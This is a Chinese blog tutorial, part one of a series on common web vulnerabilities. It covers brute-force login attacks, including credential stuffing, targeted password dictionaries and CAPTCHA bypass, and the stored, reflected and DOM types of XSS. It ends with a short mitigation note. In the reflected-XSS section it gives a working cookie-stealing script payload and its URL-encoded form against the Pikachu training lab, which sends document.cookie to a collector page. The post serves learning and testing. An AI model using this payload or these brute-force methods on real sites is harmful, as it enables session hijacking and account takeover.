常见的Web漏洞分析（上）

爱吃香菜

已于 2023-04-18 20:09:42 修改

阅读量120

点赞数

分类专栏：程序员自动化测试程序人生文章标签：单元测试程序人生自动化测试职场和发展软件测试

于 2023-04-18 19:57:56 首次发布

本文链接：https://blog.csdn.net/wx17343624830/article/details/130219603

版权

程序人生同时被 3 个专栏收录

2644 篇文章 26 订阅

订阅专栏

程序员

2493 篇文章 2 订阅

订阅专栏

自动化测试

2330 篇文章 14 订阅

订阅专栏

暴力破解攻击

概述

不断地去试用户名和密码，直到试出来。

字典

1.常见的弱口令；

2.互联网上被脱裤后的账号密码（撞库），人们为了方便记忆很多网站使用相同的账号密码；

3.指定字符利用工具生成专属字典，已知某妹子的姓名手机号爱好等生产专属子字典。

产生条件

是否要求用户设置复杂密码；

是否每次认证使用安全的验证码；

是否对尝试登录的行为进行判断限制（例如五次输错暂停登录30分钟）；

是否在必要的情况下采用了双因素认证（例如不光验证账号密码，还验证登录设备）。

测试流程

1.确认登录接口的脆弱性；

2.对字典进行优化；

3.工具自动化操作。

技巧：

1.试注册确认账号密码的要求（例如长度6位以上不允许出现数字）；

2.管理员后台密码admin/administrator/root几率高。

常见场景

1.前端验证验证码

2.后台验证验证码

验证码使用后没有被丢弃
后台没有验证
后台验证码参数为空，始终验证正确

3.token防验证码

后台生成token，会直接写在前端，编写脚本获取token，一起提交。

XSS（跨站脚本漏洞）

产生原理

攻击者在存在XXS漏洞的网站写入脚本，用户访问XXS页面返回带有恶意JS的页面，触发脚本，执行脚本发送窃取数据到攻击者指定的端口，攻击者伪造用户登录。

主要原因：

对输入和输出的控制不够严格，导致精心构造的脚本在输入后，在输到前端时被浏览器当作有效代码执行。

测试流程

1.输入特殊字符 '"<>?&

tips:输入长度限制，改前端代码

2.成功后输入payload

常见类型

1.存储型

特点：存在数据库，永久存储

易发情况：留言板，注册

2.反射型

特点：一次性

易发情况：查询页面

get 带有XSS的URL伪装后发送给目标。

<script>document.location='http://127.0.0.1:8080/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>'</script>http://127.0.0.1:8080/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F127.0.0.1%3A8080%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E%27%3C%2Fscript%3E&submit=submit

post 制作另一个网页向C2发送数据。

3.DOM型

特点：不与后台服务器产生数据交互，DOM操作前端代码输出产生，属于反射型构造前端闭合。

防范措施

输入做过滤，输出做转义。